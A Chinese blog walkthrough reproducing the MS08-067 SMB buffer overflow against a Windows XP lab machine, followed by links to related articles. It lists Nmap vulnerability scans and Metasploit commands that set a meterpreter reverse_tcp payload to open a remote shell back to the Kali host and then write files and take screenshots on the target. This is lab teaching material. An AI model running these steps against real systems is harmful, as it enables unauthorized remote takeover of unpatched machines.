占领靶机:缓冲区溢出实验-MS08-067 (例:Kali创建Windows XP文件并截图)

于 2024-07-08 11:11:13 发布
阅读量1.1k 收藏 14
点赞数 29
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76234369/article/details/140261470
版权

 一.漏洞描述

     MS08-067漏洞全称是“Windows Server服务RPC请求缓冲区溢出漏洞”,攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC(Remote Procedure Call,远程过程调用)请求,造成栈缓冲区内存错误,从而被利用实施远程代码执行。

  当用户在受影响的系统上收到RPC请求时,该漏洞会允许远程执行代码,攻击者可以在未经身份验证情况下利用此漏洞运行任意代码。同时,该漏洞可以用于蠕虫攻击。它影响了某些旧版本的Windows系统,包括:

  • Windows 2000
  • Windows XP
  • Windows Server 2003

  漏洞原理:

    MS08-067漏洞是通过MSRPC over SMB通道调用Server程序中的NEtPathCanonicalize函数时触发的。NetPathCanonicalize函数在远程访问其他主机时,会调用NetpwPathCanonicalize函数,对远程访问的路径进行规范化,而在NetpwPathCanonicalize函数中发生了栈缓冲区内存错误(溢出),造成可被利用实施远程代码执行(Remote Code Execution)。

二.环境搭建                       

1.   环境准备

  • 受害机:Windows XP SP3
  • 攻击机:Kali

  确保虚拟机两个系统之间能够相互通信。

  • Kali192.168.200.104
  • Win XP192.168.200.108

打开Windows XP系统,确定445端口开启。如下图所示,在Win XP的CMD中输入“netstat -ano”查看端口445是否打开。

关闭Windows XP系统的防火墙。

2.445端口详解

 “135、137、138、139和445端口”都是与文件共享和打印机共享有关的端口,而且在这几个端口上经常爆发很严重的漏洞。比如2017年危害全球的永恒之蓝,就是利用的445端口。本篇文章的445端口就是利用SMB(Server Message Block)Windows协议族,用于文件共享、打印共享的服务。

   

三.利用Metasploit复现漏洞

   1.利用Nmap工具扫描端口及确认该漏洞是否存在。

      nmap -n -p 445 --script smb-vuln-ms08-067 192.168.200.108 --open

       nmap漏扫脚本目录为“/usr/share/nmap/script/”,扫描结果为VULNERABLE,表示MS0808-067漏洞存在且可以利用。

     或者使用 “nmap -sV -Pn 192.168.200.108” 查看目标主机开放的端口。目标机开放了135、139、445、1025、5000端口,且目标机系统为Windows XP。

   2.进入Msfconsole并利用search语句查找漏洞利用模块。

        终端内输入"msfconsole"打开metasploite命令行客户端,使用search命令查找ms08-067的漏洞利用模块。

search ms08-067

  

   3.进入漏洞模块,并查看相关的使用说明。

        使用use命令选择我们要使用的利用模块。target设置为系统默认是自动定位,如果需要精确定位,可以show targets查看所有,然后进行选择。

use exploit/windows/smb/ms08_067_netapi/use 0

show options

show targets

   4.设置攻击机、受害机信息。

  # 目标机ip
 

  set RHOST 192.168.200.108

# 端口号

set RPORT 445
 

# 设置payload

set payload windows/meterpreter/reverse_tcp

# 攻击机ip

set LHOST 192.168.200.104
 

# 设置自动类型

set target 34

# 显示配置信息

show options

  5.运行exploit反弹shell。

        此时我们成功获取了Windows XP系统的Shell,我们调用“ipconfig”查看的IP地址也是目标的  “192.168.200.108”。

 exploit/run

 ipconfig

 pwd

shell获得控制台权限

chcp 65001解决乱码

exit退出到meterpreter

quit退出会话

 6.在目标主机上创建文件夹及文件。

cd ..

# 创建文件夹

mkdir hacker

# 访问目录

dir

cd hacker

# 创建文件并写入内容

echo "hello,i am a hacker!" > hacker.txt

 7.截图。

   screenshot

流浪吗喽
关注
后渗透之缓冲区溢出实验
xiongIT的博客
03-12 443
缓冲区溢出漏洞产生的原理是,进程在存储临时数据时没有对数据的长度进行合理性检查,导致内存中的某些重要数据被覆盖。“缓冲区”是指进程中用来保存临时数据的一段内存,可以分为栈缓冲区和堆缓冲区两种。对缓冲区溢出漏洞进行攻击,会导致进程死亡、系统宕机以及主机重启等后果。
MS08-067 RPC请求缓冲区溢出漏洞利用
凝聚力安全团队
11-13 1954
Windows 系统上的服务服务中存在一个远程执行代码漏洞。 该漏洞是由于服务不正确地处理特制的 RPC 请求导致的。 成功利用此漏洞的攻击者可以完全控制受影响的系统。 影响系统 - Windows Vista - Windows 2000 Service - Windows Server 2008 - Windows Server 2003 - Windows XP
kali+php+缓冲区溢出,kali实战-缓冲区溢出
weixin_29204749的博客
04-13 161
我们之前可能都了解过自动化的程序,学习自动化程序的使用方法,但是在计算机领域有一个词语叫做“零日漏洞”,这样的漏洞是如何发现的呢?有些漏洞通过远程就可以控制你的计算机,安装***,达到这样的目的,他们是如何通过远程控制你的系统的呢?今天我们学习此类***中最主要一种:缓冲区溢出,通过缓冲区溢出我们就可以控制目标机器。基于本章的内容从原理上我们已经具备这样的方法可以自己去发现“零日漏洞”,发现的原理...
缓冲区溢出漏洞实验
weixin_34061555的博客
10-14 155
缓冲区溢出漏洞实验 实验准备 根据实验指导输入命令安装一些用于编译 32 位 C 程序的软件包 实验步骤 关闭地址空间随机化功能 设置 zsh 程序 输入命令“linux32”进入32位linux环境 在 /tmp 目录下新建一个 stack.c 文件,编辑代码 编译该程序,并设置 SET-UID 在 /tmp 目录下新建一个 exploit.c 文件 注意上面的代码,\x??\x??\...
Fawkes 靶机缓冲区溢出漏洞利用代码编写等利用
qq_40898302的博客
04-28 606
主机发现 端口扫描 WEB信息收集 FTP服务攻击 缓冲区溢出 模糊测试 漏洞利用代码编写 流量转包分析 堆溢出漏洞攻击 Metasploit(MSF) 手动修复EXP代码 本地提权
信息系统安全实验(十):使用Metasploit渗透攻击MS08-067Windows Server 2003 SP0)、Samba(Ubuntu 8.04)
agjirowjtg的博客
02-01 3459
这是信息系统安全实验系列的第十篇~ 一、实验概述 1.   实验目的        学习渗透测试(penetration)的相关知识,包括渗透测试的方法及其过程。学习Metasploit的基本知识,了解其基本的架构,并且能使用其基本的功能对靶机的已知漏洞进行利用。 2.   实验环境        Kali Linux以及其他靶机环境 3.   工具介绍        Metaspl...
Windows漏洞MS08-067
Nanyeer的博客
03-21 1695
MS08-067漏洞(远程命令执行漏洞)的演示
Kali之MSF的MS08-067漏洞复现详解
weixin_47899104的博客
12-05 7439
MSF即Metasploit Framework,是一个综合性的渗透测试工具,集成信息收集、漏洞扫描、漏洞利用以及提权等功能的工具。 目前安装的kali都自带MSF,可以直接在图形界面打开 也可以在kali的终端通过使用命令msfconsole来打开。 ┌──(kalikali)-[~] └─$ ls /usr/share/metasploit-framework/ 或者2022版kali以后(在这之前的版本不知道可不可行)的直接桌面按如下步骤找到msf安装目录。 ①auxiliary模块:主要包含渗透测
(vulhub靶机通关)BoredHackerBlog: Social Network 2.0---hard_socnet2
yang1234567898的博客
01-07 3597
靶机下载地址:BoredHackerBlog: Social Network 2.0 ~ VulnHub 最终只拿到了本地权限,root权限的提升涉及逆向工程、缓冲区溢出的源码审计,还在摸索 首先,必须保证靶机kali是通过桥接模式在同一网段 主机发现: 打开kali,通过ifconfig查看主机网段 nmap扫描网段: nmap 192.168.43.0/24 找到靶机ip,开放了22、80、8000端口 获取webshell: 先访问80端口,是
MS08-067漏洞渗透测试
抬山的博客
11-10 2370
MS08-067漏洞会影响除Windows Server 2008 Core以外的所有Windows系统,包括:Windows2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta 1.安装靶机 下载window xp sp3 英文版镜像并安装在vmvare虚拟机上 靶机ip:192.168.65.128 ...
MS08-067 漏洞利用与安全加固,源码解析
最新发布
2401_83974064的博客
04-18 345
有关自动更新中特定配置选项的信息,对于管理员,企业安装或想要手动安装此安全更新的最终用户,MIcrosoft 建议使用更新管理软件来立即应用此更新或利用 Microsoft Update 服务检查更新,如图所示。但MS08_067安全加固的时候 英文版的补丁找不到,下载了kb988644无法实现安全加固复现过程,所以安全加固的使用 Windows XP Server Pack 2 中文版,中文版存在漏洞,只是我现在复现不了攻击成功的过程。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!
缓冲区溢出MS08-067漏洞复现
qq_51331767的博客
11-09 403
MS08-067漏洞全称是“Windows Server 服务RPC请求缓冲区溢出漏洞”,攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC(Remote Procedure Call,远程过程调用)请求,造成栈缓冲区内存错误,从而被利用实施远程代码执行。当用户在受影响的系统上受到RPC请求时,该漏洞会允许远程代码执行,攻击者可以在未经身份验证情况下利用此漏洞运行任意代码。同时,该漏洞可以用于蠕虫攻击。
MS08-067漏洞分析与复现
qq_43443410的博客
07-30 2860
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 提示:这里可以添加本文要记录的大概内容: 如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案可供参考 一、pandas是什么? 示:pandas 是基于NumPy 的一种工具,该工具是为了解决数据.
MS08-067漏洞复现
m0_73263892的博客
06-23 204
靶机:win xp 开启445端口攻击机:kali
远程命令执行——MS08-067漏洞利用
wwwwyyyrre的博客
04-24 1233
漏洞是通过 MSRPC over SMB 通道调用 Server 服务程序中的 NetPathCanonicalize 函数时触发的,而 NetPathCanonicalize 函数在远程访问其他主机时,会调用 NetpwPathCanonicalize 函数,对远程访问的路径进行规范化,而在 NetpwPathCanonicalize 函数中存在的逻辑错误,造成栈缓冲区可被溢出,而获得远程代码执行(Remote Code Execution)。因为在配置里,攻击机以及攻击端口都有所以不需要重新配置。
kali利用MS08_067简单渗透的过程
只为成最好的自己
08-07 4174
被攻击者IP:192.168.128.149                        操作系统:Windows Server 2003 第一步,检测数据库的连接状态: msf > db_status [*] postgresql connected to msf 第二步:开始扫描运行的服务: msf > db_nmap -sS -sV -O -n 192.168.128.149
MS08-067远程代码执行漏洞(CVE-2008-4250) | Windows Server服务RPC请求缓冲区溢出漏洞复现
Shadow_DAI_990101的博客
09-14 3847
SMB(Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口,SMB使用了NetBIOS的API。等我学会了再写吧…可以先参考如下文章MS08-067复现与简单分析漏洞考古:MS08-067详细分析。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值